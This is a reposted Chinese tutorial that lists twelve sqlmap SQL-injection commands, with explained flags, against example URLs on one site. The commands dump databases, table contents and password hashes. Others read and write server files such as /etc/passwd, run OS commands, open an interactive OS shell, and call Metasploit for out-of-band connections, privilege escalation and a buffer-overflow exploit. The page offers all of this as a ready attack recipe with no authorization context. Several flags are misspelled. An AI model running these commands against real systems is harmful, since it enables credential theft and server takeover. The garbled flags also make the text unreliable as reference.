安基网 首页 IT技术 安全攻防 查看内容

Sqlmap实战教程(共12种Sql注入演示例子)

2018-10-25 20:48| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 相信很多都知道Sqlmap,但是却不知道如何通过sqlmap来注入对吗?今天将实战教大家如何真正的使用sqlmap来注入?只要知道这12种方法,包你只需要使用Sqlmap这一个工具掌握这12种用法就能打遍天下无敌手;Sqlmap注入使 ...

相信很多都知道Sqlmap,但是却不知道如何通过sqlmap来注入对吗?

今天将实战教大家如何真正的使用sqlmap来注入?只要知道这12种方法,包你只需要使用Sqlmap这一个工具掌握这12种用法就能打遍天下无敌手;

 

Sqlmap注入使用方法1:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

-u                         目标地址

-f                          广泛指纹后端DBMS

-b                         检索DBMS横幅

--current-user      检索当前会话用户

--current-db         检索当前数据库

--users                 枚举数据库用户

--passwords         枚举数据库用户密码散列

--dbs                    枚举可用的数据库

-v VERBOSE         详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法2:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 -b --passwords -U CU --union-use -v 2

-u                         目标地址

-b                         检索DBMS横幅

--passwords         枚举数据库用户密码散列

-U                         指定数据库用户(cu,当前用户的别名)

--unlon-use         如果可能,通过联合查询sql注入检索数据

-v VERBOSE         详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法3:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_str2.asp?name=fujieace --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

-u                         目标地址

--dump                打印表项

-T                         打印表(users)

-C                         打印列(surname)

--start                  第一个项输入(2,第二个表格顶部)

--stop                  最后一项输入(3,第三个表格顶部)

-v VERBOSE         详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法4:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --dump -C 'user.pass' -v 1 --exclude-sysdbs

-u                               目标地址

--dump                      打印表项

-C                               打印列(user.pass)

-v VERBOSE                详细程度级别:0-6(默认值1)

--exclude-sysdbs       lgnore系统数据库(e.g.information_schema)

 

注意:没有提供table名(-T选项)

 

Sqlmap注入使用方法5:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 --sql-shell -v 2

-u                               目标地址

--sql-shell                  产生一个交互式的sql shell

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法6:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --read-file "c:\example.txt" -v 2

-u                               目标地址

--read-file                 文件以从底层文件系统读取

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法7:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

-u                               目标地址

--write-file                文件上传到底层文件系统(/ etc / passwd)

--dest-file                  绝对文件系统路径写入(/ tmp / writetest)

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法8:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --os-cmd "id" -v 1

-u                               目标地址

--os-cmd   操作系统命令执行(id)

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法9:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.aspx?id=1 --os-shell -v 1 --union-use

-u                              目标地址

--os-shell                  生成交互式命令提示符

---union-usea           如果可能的话,通过联合查询SQL注入使用petrieve数据

-v VERBOSE               详细程度级别:0-6(默认值1)

 

 

Sqlmap注入使用方法10:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/iis/get_int.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

-u                              目标地址

--os-pwn                  建立用户和数据库服务器之间的带外连接

--msf-path                metasploit文件系统路径(/home/inquis/software/metasploit)

--prive-esc                尝试将数据库进程的用户权限提升到系统

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法11:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

-u                              目标地址

--os-pwn                  建立用户和数据库服务器之间的带外连接

--msf-path                metasploit文件系统路径(/home/inquis/software/metasploit)

-v VERBOSE               详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法12:

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --os-bof -v 1 --mst-path ~/software/metasploit

-u                              目标地址

--os-bof                    通过利用微软sql服务器缓冲区溢出(MS09-04)建立用户和数据库服务器之间的带外连接,

--msf-path                metasploit文件系统路径(/home/inquis/software/metasploit)

-v VERBOSE               详细程度级别:0-6(默认值1)

Tag标签:

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.fujieace.com/hacker/sqlmap-12.html

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部